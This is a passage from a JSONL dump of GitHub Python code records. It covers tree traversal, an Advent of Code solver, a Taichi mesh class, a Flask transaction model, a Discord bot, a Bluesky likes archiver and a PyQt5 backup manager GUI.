Just complete the function levelOrder() that takes the root node as parameter and returns an array containing the level order traversal of the given Binary Tree.\n\nExpected Time Complexity: O(N).\nExpected Auxiliary Space: O(N).\n\nConstraints:\n1 <= T <= 100\n1 <= Number of nodes<= 104\n1 <= Data of a node <= 104\n\nExample:\nInput:\n2\n1 3 2\n10 20 30 40 60 N N\nOutput:\n1 3 2\n10 20 30 40 60\n\nExplanation:\nTestcase1: The tree is\n 1\n / \\\n 3 2\nSo, the level order would be 1 3 2\nTestcase2: The tree is\n 10\n / \\\n 20 30\n / \\\n 40 60\nSo, the level order would be 10 20 30 40 60\n'''\n\nclass Node:\n def __init__(self, value):\n self.left = None\n self.data = value\n self.right = None\n\n# Your task is to complete this function\n# Function should return the level order of the tree in the form of a list of integers\n\ndef levelOrder( root ):\n if root is None:\n return\n q = []\n l = []\n q.append(root)\n l.append(root.data)\n while( len(q) > 0 ):\n node = q.pop(0)\n if(node.left != None):\n q.append(node.left)\n l.append(node.left.data)\n if(node.right != None):\n q.append(node.right)\n l.append(node.right.data)\n return l\n","repo_name":"shabnam49/Geeks_For_Geeks","sub_path":"Easy/Level-order-traversal.py","file_name":"Level-order-traversal.py","file_ext":"py","file_size_in_byte":2164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"33291529804","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Dec 15 22:32:33 2019\n\n@author: dennis\n\"\"\"\n\nfrom IntcodeComputer import IntcodeComputer\nfrom IntcodeComputer import read_opcode\nimport Game\nimport networkx as nx\n\nopcodes = read_opcode('data/input.txt')\ncomputer = IntcodeComputer(opcodes.copy(), [])\ngame = Game.Game()\n\ndef move_long(moves):\n for move in moves:\n while not computer.awaiting_input:\n computer.step()\n computer.input_queue.append(move)\n while not computer.output_queue:\n computer.step()\n 
game.move(move, computer.output_queue.pop())\n# game.draw()\n \ndef dist_to_node(pos):\n return len(game.get_path(pos))\n\nold_pos = (1, 1)\nco = 0\n#while not game.done:\nwhile game.to_test:\n if computer.awaiting_input:\n for i in range(1, len(game.to_test)):\n next_node = game.to_test[-i]\n if next_node not in game.visited:\n continue\n game.visited.add(next_node)\n if (next_node == (game.player.x, game.player.y)) or (next_node in game.visited):\n if next_node in game.to_test:\n game.to_test.remove(next_node)\n path = game.get_path(next_node)\n moves = [game.get_move(path[i], path[i+1]) for i in range(len(path)-1)]\n old_pos = (game.player.x, game.player.y)\n move_long(moves)\n co += 1\n computer.step()\n\ngame.graph.remove_edge((50,50), (50,51))\ngame.graph.remove_edge((50,50), (50,49))\ngame.graph.remove_edge((50,50), (51,50))\n#game.draw_solution()\nprint(nx.astar_path_length(game.graph, (50, 50), (game.answer[0], game.answer[1])))\n","repo_name":"dennissv/aoc-bit","sub_path":"day-15/dennis.py","file_name":"dennis.py","file_ext":"py","file_size_in_byte":1634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"40421157002","text":"from taichi.core import tc_core\nfrom taichi.misc.util import *\nfrom taichi.scoping.transform_scope import get_current_transform\nimport taichi\n\ndef map_filename(name):\n if name == 'plane':\n return taichi.geometry.create_plane((1, 1))\n elif name == 'sphere':\n return taichi.geometry.create_sphere((100, 100))\n elif name == 'torus':\n return taichi.geometry.create_torus((100, 100), 0.7, 1.0)\n if name.rfind('/') == -1:\n filename = taichi.settings.get_asset_path('meshes/' + name + '.obj')\n else:\n filename = name\n return filename\n\n\nclass Mesh:\n def __init__(self, filename_or_triangles, material=None, translate=Vector(0, 0, 0), rotation=Vector(0, 0, 0),\n scale=Vector(1, 1, 1),\n transform=None):\n if isinstance(filename_or_triangles, str):\n filename_or_triangles = 
map_filename(filename_or_triangles)\n self.c = tc_core.create_mesh()\n if isinstance(filename_or_triangles, str):\n self.c.initialize(config_from_dict({'filename': filename_or_triangles}))\n else:\n self.c.initialize(config_from_dict({'filename': ''}))\n self.c.set_untransformed_triangles(filename_or_triangles)\n if transform:\n self.c.transform = transform\n self.c.set_material(material.c)\n self.scale(scale)\n self.rotate_euler(rotation)\n self.translate(translate)\n self.set_transform(get_current_transform() * self.c.transform)\n\n def set_transform(self, transform):\n self.c.transform = transform\n\n def scale(self, s):\n if isinstance(s, float) or isinstance(s, int):\n self.c.transform = self.c.transform.scale_s(float(s))\n else:\n self.c.transform = self.c.transform.scale(Vector(s))\n\n def rotate_euler(self, rotation):\n self.c.transform = self.c.transform.rotate_euler(Vector(rotation))\n\n def translate(self, translate):\n self.c.transform = self.c.transform.translate(Vector(translate))\n\n def __getattr__(self, key):\n return self.c.__getattribute__(key)\n","repo_name":"CallmeNezha/taichi","sub_path":"python/taichi/visual/mesh.py","file_name":"mesh.py","file_ext":"py","file_size_in_byte":2104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"44"} +{"seq_id":"74931884841","text":"from db import db\nfrom models.user import UserModel\nfrom utils.date_format import getTimeStringFromTimeStamp\nfrom sqlalchemy import desc\n\nclass TransactionModel(db.Model):\n __tablename__ = 'transactions'\n\n id = db.Column(db.Integer, primary_key=True)\n amount = db.Column(db.Integer)\n desc = db.Column(db.String(100))\n source = db.Column(db.String(100))\n status = db.Column(db.Integer, default=1, nullable=True, comment=\"0 là khởi tạo, 1 là thành công\")\n created_at = db.Column(db.Integer, nullable=True, comment=\"Timestamp\")\n created_by = db.Column(db.String(255), nullable=True, comment=\"Timestamp\")\n updated_at = 
db.Column(db.Integer, nullable=True, comment=\"Timestamp\")\n updated_by = db.Column(db.String(255), nullable=True, comment=\"Timestamp\")\n\n user_id = db.Column(db.Integer, db.ForeignKey('users.id'))\n user = db.relationship('UserModel')\n\n def __init__(self, amount, desc, source, status, user_id, created_at, created_by, updated_at, updated_by):\n self.amount = amount\n self.desc = desc\n self.source = source\n self.status = status\n self.user_id = user_id\n self.created_at = created_at\n self.created_by = created_by\n self.updated_at = updated_at\n self.updated_by = updated_by\n\n def json(self):\n user = UserModel.find_by_id(self.user_id)\n\n return {\n 'id': self.id,\n 'amount': self.amount,\n 'desc': self.desc,\n 'source': self.source,\n 'status': self.status,\n 'user_id': self.user_id,\n 'user_name': user.username if user else None,\n 'created_at': self.created_at,\n 'created_at_string': None if self.created_at is None else getTimeStringFromTimeStamp(self.created_at),\n 'created_by': self.created_by,\n 'updated_at': self.updated_at,\n 'updated_at_string': None if self.updated_at is None else getTimeStringFromTimeStamp(self.updated_at),\n 'updated_by': self.updated_by,\n }\n\n @classmethod\n def find_by_apikey(cls, apikey):\n return cls.query.filter_by(apikey=apikey).first()\n\n @classmethod\n def find_by_id(cls, _id):\n return cls.query.filter_by(id=_id).first()\n\n def save_to_db(self):\n db.session.add(self)\n db.session.commit()\n\n @classmethod\n def find_all(cls):\n return cls.query.order_by(desc(cls.created_at)).all()\n\n @classmethod\n def q(cls, filters=None, order=None, order_by=None, page=0, page_size=10):\n search = \"%{}%\".format(filters) if filters is not None else \"%%\"\n return cls.query.filter(cls.desc.like(search)).order_by(cls.created_at.desc()).offset(page * page_size).limit(\n page_size).all()\n\n def delete_from_db(self):\n db.session.delete(self)\n 
db.session.commit()\n","repo_name":"toannguyen3105/sampleAPIFlask","sub_path":"models/transaction.py","file_name":"transaction.py","file_ext":"py","file_size_in_byte":2861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"34055618335","text":"import discord\nfrom discord.ext import commands\nfrom discord.ext.commands import MemberConverter\nimport os\n\nTOKEN = os.environ['TOKEN']\nbot = commands.Bot(command_prefix='//')\n\n@bot.event\nasync def on_ready():\n print('Benzene is ready to go!')\n\n@bot.command()\nasync def ping(ctx):\n await ctx.channel.send(f\"Pong! {round(bot.latency * 1000)}ms\")\n\n@bot.command()\nasync def getpfp(ctx, arg):\n\n converter = MemberConverter()\n member = await converter.convert(ctx, arg)\n await ctx.send(member.avatar_url)\n\n@bot.command()\nasync def clear(ctx, amount = 1):\n await ctx.channel.purge(limit = amount+1)\n\n@bot.command(pass_context=True)\n@commands.has_role(\"Admin\")\n@commands.has_permissions(kick_members=True)\nasync def kick(ctx, arg):\n converter = MemberConverter()\n member = await converter.convert(ctx, arg)\n await ctx.send('kik')\n await bot.kick(member)\n\n\nbot.run(TOKEN)\n","repo_name":"Cookieglue/Benzene-Bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"21892183367","text":"import json\nimport csv\nimport os\nfrom database import db_operations\n\n\n\n\n\ndbo = db_operations.DBOperator()\n\ndef insert_top_urls():\n urls_path = '../SWSec_Data/top_sites2.json'\n with open(urls_path,'r') as o:\n sites = json.loads(o.read())\t\t\t\n for item in sites:\n rank = int(item['Country']['Rank'])\n url = 'https://' + item['DataUrl']\t \n dbo.insert_alexa_sites_table(url, rank )\n\ndef update_pwa_sites():\n urls_path = '../SWSec_Crawler/data/crawl_sites_sw.csv'\n with open(urls_path) as cf:\n csvreader = 
csv.DictReader(cf, delimiter=',' )\t\t\t\n for row in csvreader:\t\t\n if 'Alexa' in row['id']:\n rank = row['id'].split('_')[2] \n url = row['url']\n print(url)\n dbo.update_alexa_sites_table(None, url, 'is_sw_found', 'True')\n\t\t\t\t\ndef update_crawled_sites():\n dir_path = '../SWSec_Crawler/output_logs/'\n for f in os.listdir(dir_path):\n if 'container_Seed_Alexa_' in f:\n rank = int(f.split('.')[0].split('_')[3])\n dbo.update_alexa_sites_table(rank, None, 'is_crawled', 'True')\t\t\t\t\n\nif __name__ == \"__main__\":\n # insert_top_urls()\n # update_pwa_sites()\n update_crawled_sites()","repo_name":"karthikaS03/SW_Sec_Project","sub_path":"SWSec_Analysis/process_seed_urls.py","file_name":"process_seed_urls.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"6389853176","text":"import requests\nimport arrow\nimport math\nimport time\nimport sys\nimport urllib.parse\nfrom dataclasses import dataclass\nfrom functools import lru_cache\n\ndef list_likes(user, limit=100, cursor=None):\n params = {\n 'repo': user,\n 'collection': 'app.bsky.feed.like',\n 'limit': str(limit)\n }\n if cursor:\n params['cursor'] = cursor\n\n r = requests.get('https://bsky.social/xrpc/com.atproto.repo.listRecords?' + urllib.parse.urlencode(params))\n if r.status_code // 100 != 2:\n raise Exception(f'error status code for list_likes: {r.status_code} {r.text} {params}')\n \n return r.json()\n\n@dataclass\nclass AtUri:\n repo: str\n collection: str\n rkey: str\n\n @staticmethod\n def parse(uri):\n if not uri.startswith('at://'):\n return None\n parts = uri[len('at://'):]\n parts = parts.split('/', 2)\n return AtUri(repo=parts[0], collection=parts[1], rkey=parts[2])\n\ndef get_post(uri, cid):\n ref = AtUri.parse(uri)\n params = {\n 'repo': ref.repo,\n 'collection': ref.collection,\n 'rkey': ref.rkey,\n 'cid': cid\n }\n\n r = requests.get('https://bsky.social/xrpc/com.atproto.repo.getRecord?' 
+ urllib.parse.urlencode(params))\n if r.status_code // 100 != 2:\n raise Exception(f'error status code for get_post: {r.status_code} {r.text} {params}')\n \n return r.json()\n\n@lru_cache(maxsize=500)\ndef get_user(repo):\n params = {\n 'repo': repo\n }\n\n r = requests.get('https://bsky.social/xrpc/com.atproto.repo.describeRepo?' + urllib.parse.urlencode(params))\n if r.status_code // 100 != 2:\n raise Exception(f'error status code for get_user: {r.status_code} {r.text} {params}')\n \n return r.json()\n\ndef fetch_likes(user, limit=100, stop_at=None):\n sleep_time = 0.0005 * limit\n if limit <= 0:\n limit = math.inf\n sleep_time = 0.001\n chunk_size = min(limit, 100)\n stop_time = arrow.get(stop_at) if stop_at else None\n\n likes = []\n cursor = None\n\n remaining = limit\n while remaining > 0:\n out = list_likes(user, chunk_size, cursor=cursor)\n new_likes = out.get('records', [])\n\n exit = False\n for like in new_likes:\n created_ts = arrow.get(like['value']['createdAt'])\n if stop_time and created_ts <= stop_time:\n exit = True\n break\n try:\n post = get_post(like['value']['subject']['uri'], like['value']['subject']['cid'])\n if post:\n like['value']['subject'] = post\n post_uri = AtUri.parse(like['value']['subject']['uri'])\n try:\n post_user = get_user(post_uri.repo)\n if post_user:\n like['value']['user'] = post_user\n except Exception as ue:\n print(f'could not fetch user: {ue}\\nfrom post: {post}\\nfrom like: {like}\\n\\n', file=sys.stderr)\n except Exception as e:\n print(f'could not fetch post: {e}\\nfrom like: {like}\\n\\n', file=sys.stderr)\n\n likes.append(like)\n remaining -= 1\n time.sleep(sleep_time)\n \n if 'cursor' not in out or out['cursor'] == cursor:\n exit = True\n \n if exit:\n break\n\n cursor = out['cursor']\n \n return 
likes\n\n\n","repo_name":"jwoglom/bluesky-likes-archiver","sub_path":"bsky.py","file_name":"bsky.py","file_ext":"py","file_size_in_byte":3422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"19164176360","text":"from PyQt5.QtCore import Qt\n\ntry:\n from PyQt5 import QtCore\n from PyQt5.QtWidgets import QWidget, QHBoxLayout, QLabel, QDockWidget, QVBoxLayout, QListWidget, QAbstractItemView, \\\n QMessageBox, QApplication, QGridLayout, QGroupBox, QScrollArea, QTableWidget, QSizePolicy, QTableWidgetItem, \\\n QPushButton, QCheckBox, QTreeWidget, QTreeWidgetItem, QHeaderView\nexcept ImportError as e:\n print(\n f'package PyQt5 Not Found\\n{e}\\ntry :\\npip3 install --user pyqt5\\nOR\\ndnf install python3-pyqt5, yum install python3-pyqt5\\n')\n\ntry:\n import qtmodern.styles\n import qtmodern.windows\nexcept ImportError as e:\n print(f'package qtmodern Not Found\\n{e}\\ntry :\\npip3 install --user qtmodern\\n')\n\ntry:\n from backup.configurebackup import CreateFullBackupWindow, DeleteFullBackupWindow, DeleteIncBackupWindow, \\\n MoreFullBackupWindow, RestoreFullBackupWindow, MoreIncBackupWindow, CreateIncBackupWindow, \\\n RestoreIncBackupWindow\nexcept ImportError as e:\n print(f'package not found\\n{e}\\n')\n\ntry:\n import sqlite3\nexcept ImportError as e:\n print(f'package not found\\n{e}\\n')\n\n\ndef getContentBackup(self):\n global con\n global cur\n con = sqlite3.connect('backup/backupshistory.db')\n cur = con.cursor()\n\n self.gridBackup = QGridLayout()\n self.gridBackup.setColumnMinimumWidth(1100, 1100)\n self.titlefullbackup = QLabel('Full Backups : ')\n self.titleincbackup = QLabel('Incremental Backups : ')\n self.titlefullbackup.setStyleSheet(\"color: #303a46;font: bold 14px;\")\n self.titleincbackup.setStyleSheet(\"color: #303a46;font: bold 14px;\")\n\n createTableFullBackup(self)\n createTableIncBackup(self)\n\n createFullBackupButtons(self)\n createIncBackupButtons(self)\n\n 
self.containerBackup = QVBoxLayout()\n\n self.containerBackup.addLayout(self.gridBackup)\n self.containerBackup.addLayout(self.hboxfullbackupbtn)\n self.containerBackup.addWidget(self.tableFullBackup)\n self.containerBackup.addLayout(self.hboxincbackupbtn)\n self.containerBackup.addWidget(self.tableIncBackup)\n\n self.bottomRightLayout.addLayout(self.containerBackup)\n\n\ndef createTableFullBackup(self):\n self.tableFullBackup = QTableWidget()\n self.tableFullBackup.setRowCount(0)\n self.tableFullBackup.setColumnCount(8)\n\n header = self.tableFullBackup.horizontalHeader()\n header.setStretchLastSection(True)\n\n self.tableFullBackup.setHorizontalHeaderItem(0, QTableWidgetItem(\"Backup ID\"))\n self.tableFullBackup.setHorizontalHeaderItem(1, QTableWidgetItem(\"Backup Date\"))\n self.tableFullBackup.setHorizontalHeaderItem(2, QTableWidgetItem(\"Backup Name\"))\n self.tableFullBackup.setHorizontalHeaderItem(3, QTableWidgetItem(\"Source Path\"))\n self.tableFullBackup.setHorizontalHeaderItem(4, QTableWidgetItem(\"Destination Path\"))\n self.tableFullBackup.setHorizontalHeaderItem(5, QTableWidgetItem(\"Excluded Items\"))\n self.tableFullBackup.setHorizontalHeaderItem(6, QTableWidgetItem(\"More\"))\n self.tableFullBackup.setHorizontalHeaderItem(7, QTableWidgetItem(\"Select\"))\n self.tableFullBackup.setEditTriggers(QAbstractItemView.NoEditTriggers)\n showmyfullbackuplist(self)\n\n\ndef updateTableFullBackup(self):\n try:\n self.tableFullBackup.setRowCount(0)\n self.rowposition = 0\n showmyfullbackuplist(self)\n except Exception:\n return None\n\n\ndef createFullBackupButtons(self):\n self.hboxfullbackupbtn = QHBoxLayout()\n self.addFullBackupBtn = QPushButton('Add')\n self.restoreFullBackupBtn = QPushButton('Restore')\n self.deleteFullBackupBtn = QPushButton('Delete')\n self.addFullBackupBtn.setFixedHeight(30)\n self.addFullBackupBtn.setFixedWidth(120)\n self.restoreFullBackupBtn.setFixedHeight(30)\n self.restoreFullBackupBtn.setFixedWidth(120)\n 
self.deleteFullBackupBtn.setFixedHeight(30)\n self.deleteFullBackupBtn.setFixedWidth(120)\n self.addFullBackupBtn.clicked.connect(lambda: createFullBackupWindow(self))\n self.addFullBackupBtn.setStyleSheet(\"color: #ecf0f1; background-color: #2ecc71 ; border: 0px solid #2c3e50\")\n self.restoreFullBackupBtn.clicked.connect(lambda: restoreFullBackupWindow(self, self.fullbackupdic))\n self.restoreFullBackupBtn.setStyleSheet(\"color: #ecf0f1; background-color: #34495e ; border: 0px solid #2c3e50\")\n self.deleteFullBackupBtn.clicked.connect(lambda: deleteFullBackupWindow(self, self.fullbackupdic))\n self.deleteFullBackupBtn.setStyleSheet(\"color: #ecf0f1; background-color: #e74c3c; border: 0px solid #2c3e50\")\n self.selectall = SelectAllFullBackupButton(self.fullbackupdic)\n self.hboxfullbackupbtn.addWidget(self.titlefullbackup)\n self.hboxfullbackupbtn.addWidget(self.selectall)\n self.hboxfullbackupbtn.addStretch()\n self.hboxfullbackupbtn.addWidget(self.restoreFullBackupBtn)\n self.hboxfullbackupbtn.addWidget(self.addFullBackupBtn)\n self.hboxfullbackupbtn.addWidget(self.deleteFullBackupBtn)\n\n\nclass SelectCellInTableFullBackup(QWidget):\n def __init__(self, parent=None):\n super(SelectCellInTableFullBackup, self).__init__(parent)\n self.isSelected = False\n self.hbox = QHBoxLayout()\n self.checkb = QCheckBox(self)\n self.checkb.stateChanged.connect(self.checkBoxChangedAction)\n self.hbox.addStretch()\n self.hbox.addWidget(self.checkb)\n self.hbox.addStretch()\n self.hbox.setContentsMargins(0, 0, 0, 0)\n self.hbox.setSpacing(8)\n self.setLayout(self.hbox)\n\n def checkBoxChangedAction(self, state):\n if (QtCore.Qt.Checked == state):\n self.isSelected = True\n else:\n self.isSelected = False\n\n\nclass SelectAllFullBackupButton(QWidget):\n def __init__(self, d, parent=None):\n super(SelectAllFullBackupButton, self).__init__(parent)\n self.dd = d\n self.selectAllIsSelected = False\n self.hbox = QHBoxLayout()\n self.selectall = QCheckBox('Select/Deselect All', 
self)\n self.selectall.stateChanged.connect(self.selectAllChangedAction)\n self.hbox.addWidget(self.selectall)\n self.hbox.setContentsMargins(0, 0, 0, 0)\n self.hbox.setSpacing(8)\n self.setLayout(self.hbox)\n\n def selectAllChangedAction(self, state):\n if (QtCore.Qt.Checked == state):\n self.selectallIsSelected = True\n for i in self.dd:\n self.dd[i].isSelected = True\n self.dd[i].checkb.setChecked(True)\n else:\n self.selectallIsSelected = False\n for i in self.dd:\n self.dd[i].isSelected = False\n self.dd[i].checkb.setChecked(False)\n\n\nclass moreCellInTableFullBackup(QWidget):\n def __init__(self, id, parent=None):\n super(moreCellInTableFullBackup, self).__init__(parent)\n self.id = id\n self.hbox = QHBoxLayout()\n self.showmoreBtn = QPushButton('more')\n self.showmoreBtn.clicked.connect(self.showmoreBtnClicked)\n self.hbox.addWidget(self.showmoreBtn)\n self.hbox.addStretch()\n self.hbox.setContentsMargins(0, 0, 0, 0)\n self.hbox.setSpacing(8)\n self.setLayout(self.hbox)\n\n def showmoreBtnClicked(self):\n self.setCursor(Qt.WaitCursor)\n self.secondwindow = MoreFullBackupWindow(self.id)\n self.sw = qtmodern.windows.ModernWindow(self.secondwindow)\n self.sw.show()\n self.setCursor(Qt.ArrowCursor)\n\n\ndef showmyfullbackuplist(self):\n self.fullBackupList = retrievedatafromdbfullbackup()\n self.fullbackupdic = {}\n self.fullbackupdic2 = {}\n self.rowposition = 0\n for i in self.fullBackupList:\n self.rowPosition = self.tableFullBackup.rowCount()\n self.tableFullBackup.insertRow(self.rowPosition)\n self.tableFullBackup.setItem(self.rowPosition, 0, QTableWidgetItem(i[0]))\n self.tableFullBackup.setItem(self.rowPosition, 1, QTableWidgetItem(i[1]))\n self.tableFullBackup.setItem(self.rowPosition, 2, QTableWidgetItem(i[2]))\n self.tableFullBackup.setItem(self.rowPosition, 3, QTableWidgetItem(i[3]))\n self.tableFullBackup.setItem(self.rowPosition, 4, QTableWidgetItem(i[4]))\n self.tableFullBackup.setItem(self.rowPosition, 5, QTableWidgetItem(i[5]))\n 
self.fullbackupdic[i[0]] = SelectCellInTableFullBackup()\n self.fullbackupdic2[i[0]] = moreCellInTableFullBackup(i[0])\n self.tableFullBackup.setCellWidget(self.rowPosition, 6, self.fullbackupdic2[i[0]])\n self.tableFullBackup.setCellWidget(self.rowPosition, 7, self.fullbackupdic[i[0]])\n\n\ndef retrievedatafromdbfullbackup():\n global cur\n listfullbackups = []\n query = \"SELECT * FROM FullBackups\"\n fullbackups = cur.execute(query).fetchall()\n for fullbackup in fullbackups:\n listfullbackups.append(\n [str(fullbackup[0]), str(fullbackup[1]), str(fullbackup[2]), str(fullbackup[3]), str(fullbackup[4]),\n str(fullbackup[5])])\n return listfullbackups\n\n\ndef createFullBackupWindow(self):\n self.secondwindow = CreateFullBackupWindow()\n self.sw = qtmodern.windows.ModernWindow(self.secondwindow)\n self.sw.show()\n\n\ndef restoreFullBackupWindow(self, d):\n list_fullbackup_to_restore = []\n for i in d:\n if d[i].isSelected == True:\n list_fullbackup_to_restore.append(i)\n if len(list_fullbackup_to_restore) == 0 or len(list_fullbackup_to_restore) > 1:\n QMessageBox.warning(self, 'warning', 'Please select just one full backup')\n else:\n self.secondwindow = RestoreFullBackupWindow(list_fullbackup_to_restore[0])\n self.sw = qtmodern.windows.ModernWindow(self.secondwindow)\n self.sw.show()\n\n\ndef deleteFullBackupWindow(self, d):\n list_fullbackups_to_delete = []\n for i in d:\n if d[i].isSelected == True:\n list_fullbackups_to_delete.append(i)\n if len(list_fullbackups_to_delete) == 0:\n QMessageBox.warning(self, 'warning', 'no selected full backups.\\nPlease select at least one full backup')\n else:\n self.secondwindow = DeleteFullBackupWindow(list_fullbackups_to_delete)\n self.sw = qtmodern.windows.ModernWindow(self.secondwindow)\n self.sw.show()\n\n\ndef createTableIncBackup(self):\n self.tableIncBackup = QTreeWidget()\n labels = ['Meta Name', 'Backup ID', 'Backup Level', 'Backup Date', 'Backup Name', 'Backup Path', 'Destination Path',\n 'Excluded Items', 'More', 
'Select']\n self.tableIncBackup.setHeaderLabels(labels)\n\n self.tableIncBackup.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)\n self.tableIncBackup.setEditTriggers(QAbstractItemView.NoEditTriggers)\n showmyincbackuplist(self)\n\n\ndef createIncBackupButtons(self):\n self.hboxincbackupbtn = QHBoxLayout()\n self.addIncBackupBtn = QPushButton('Add')\n self.restoreIncBackupBtn = QPushButton('Restore')\n self.deleteIncBackupBtn = QPushButton('Delete')\n self.addIncBackupBtn.setFixedHeight(30)\n self.addIncBackupBtn.setFixedWidth(120)\n self.restoreIncBackupBtn.setFixedHeight(30)\n self.restoreIncBackupBtn.setFixedWidth(120)\n self.deleteIncBackupBtn.setFixedHeight(30)\n self.deleteIncBackupBtn.setFixedWidth(120)\n self.addIncBackupBtn.clicked.connect(lambda: createIncBackupWindow(self))\n self.addIncBackupBtn.setStyleSheet(\"color: #ecf0f1; background-color: #2ecc71 ; border: 0px solid #2c3e50\")\n self.restoreIncBackupBtn.clicked.connect(lambda: restoreIncBackupWindow(self))\n self.restoreIncBackupBtn.setStyleSheet(\"color: #ecf0f1; background-color: #34495e ; border: 0px solid #2c3e50\")\n self.deleteIncBackupBtn.clicked.connect(lambda: deleteIncBackupWindow(self, self.incbackupdic))\n self.deleteIncBackupBtn.setStyleSheet(\"color: #ecf0f1; background-color: #e74c3c; border: 0px solid #2c3e50\")\n self.selectallinc = SelectAllIncBackupButton(self.incbackupdic)\n self.hboxincbackupbtn.addWidget(self.titleincbackup)\n self.hboxincbackupbtn.addWidget(self.selectallinc)\n self.hboxincbackupbtn.addStretch()\n self.hboxincbackupbtn.addWidget(self.restoreIncBackupBtn)\n self.hboxincbackupbtn.addWidget(self.addIncBackupBtn)\n self.hboxincbackupbtn.addWidget(self.deleteIncBackupBtn)\n\n\nclass SelectCellInTableIncBackup(QWidget):\n def __init__(self, parent=None):\n super(SelectCellInTableIncBackup, self).__init__(parent)\n self.isSelected = False\n self.hbox = QHBoxLayout()\n self.checkb = QCheckBox(self)\n 
self.checkb.stateChanged.connect(self.checkBoxChangedAction)\n self.hbox.addStretch()\n self.hbox.addWidget(self.checkb)\n self.hbox.addStretch()\n self.hbox.setContentsMargins(0, 0, 0, 0)\n self.hbox.setSpacing(8)\n self.setLayout(self.hbox)\n\n def checkBoxChangedAction(self, state):\n if (QtCore.Qt.Checked == state):\n self.isSelected = True\n else:\n self.isSelected = False\n\n\nclass SelectAllIncBackupButton(QWidget):\n def __init__(self, d, parent=None):\n super(SelectAllIncBackupButton, self).__init__(parent)\n self.dd = d\n self.selectAllIsSelected = False\n self.hbox = QHBoxLayout()\n self.selectall = QCheckBox('Select/Deselect All', self)\n self.selectall.stateChanged.connect(self.selectAllChangedAction)\n self.hbox.addWidget(self.selectall)\n self.hbox.setContentsMargins(0, 0, 0, 0)\n self.hbox.setSpacing(8)\n self.setLayout(self.hbox)\n\n def selectAllChangedAction(self, state):\n if (QtCore.Qt.Checked == state):\n self.selectallIsSelected = True\n for i in self.dd:\n self.dd[i].isSelected = True\n self.dd[i].checkb.setChecked(True)\n else:\n self.selectallIsSelected = False\n for i in self.dd:\n self.dd[i].isSelected = False\n self.dd[i].checkb.setChecked(False)\n\n\nclass moreCellInTableIncBackup(QWidget):\n def __init__(self, id, parent=None):\n super(moreCellInTableIncBackup, self).__init__(parent)\n self.id = id\n self.hbox = QHBoxLayout()\n self.showmoreBtn = QPushButton('more')\n self.showmoreBtn.clicked.connect(self.showmoreBtnClicked)\n self.hbox.addWidget(self.showmoreBtn)\n self.hbox.addStretch()\n self.hbox.setContentsMargins(0, 0, 0, 0)\n self.hbox.setSpacing(8)\n self.setLayout(self.hbox)\n\n def showmoreBtnClicked(self):\n self.setCursor(Qt.WaitCursor)\n self.secondwindow = MoreIncBackupWindow(self.id)\n self.sw = qtmodern.windows.ModernWindow(self.secondwindow)\n self.sw.show()\n self.setCursor(Qt.ArrowCursor)\n\n\ndef showmyincbackuplist(self):\n global cur\n self.incBackupList = retrievedatafromdbincbackup()\n self.incbackupdic = {}\n 
self.incbackupdic2 = {}\n for i in self.incBackupList:\n query = \"SELECT * FROM IncrementalBackups WHERE metaname=?\"\n incbackups = cur.execute(query, (i,)).fetchall()\n item1 = QTreeWidgetItem(self.tableIncBackup, [i])\n for incbackup in incbackups:\n tmplist = ['', str(incbackup[0]), str(incbackup[2]), str(incbackup[3]), str(incbackup[4]),\n str(incbackup[5]), str(incbackup[6]), str(incbackup[7])]\n subitem1 = QTreeWidgetItem(item1, tmplist)\n\n self.incbackupdic2[incbackup[0]] = moreCellInTableIncBackup(incbackup[0])\n self.tableIncBackup.setItemWidget(subitem1, 8, self.incbackupdic2[incbackup[0]])\n\n self.incbackupdic[incbackup[0]] = SelectCellInTableIncBackup()\n self.tableIncBackup.setItemWidget(subitem1, 9, self.incbackupdic[incbackup[0]])\n\n\ndef retrievedatafromdbincbackup():\n global cur\n listincbackups = []\n query = \"SELECT DISTINCT metaname FROM IncrementalBackups ORDER BY ROWID ASC\"\n incbackups = cur.execute(query).fetchall()\n for incbackup in incbackups:\n listincbackups.append(str(incbackup[0]))\n return listincbackups\n\n\ndef createIncBackupWindow(self):\n incBackupList = retrievedatafromdbincbackup()\n self.secondwindow = CreateIncBackupWindow(incBackupList)\n self.sw = qtmodern.windows.ModernWindow(self.secondwindow)\n self.sw.show()\n\n\ndef restoreIncBackupWindow(self):\n incBackupList = retrievedatafromdbincbackup()\n self.secondwindow = RestoreIncBackupWindow(incBackupList)\n self.sw = qtmodern.windows.ModernWindow(self.secondwindow)\n self.sw.show()\n\n\ndef deleteIncBackupWindow(self, d):\n list_incbackups_to_delete = []\n for i in d:\n if d[i].isSelected == True:\n list_incbackups_to_delete.append(str(i))\n if len(list_incbackups_to_delete) == 0:\n QMessageBox.warning(self, 'warning',\n 'no selected incremental backups.\\nPlease select at least one incremental backup')\n else:\n self.secondwindow = DeleteIncBackupWindow(list_incbackups_to_delete)\n self.sw = qtmodern.windows.ModernWindow(self.secondwindow)\n 
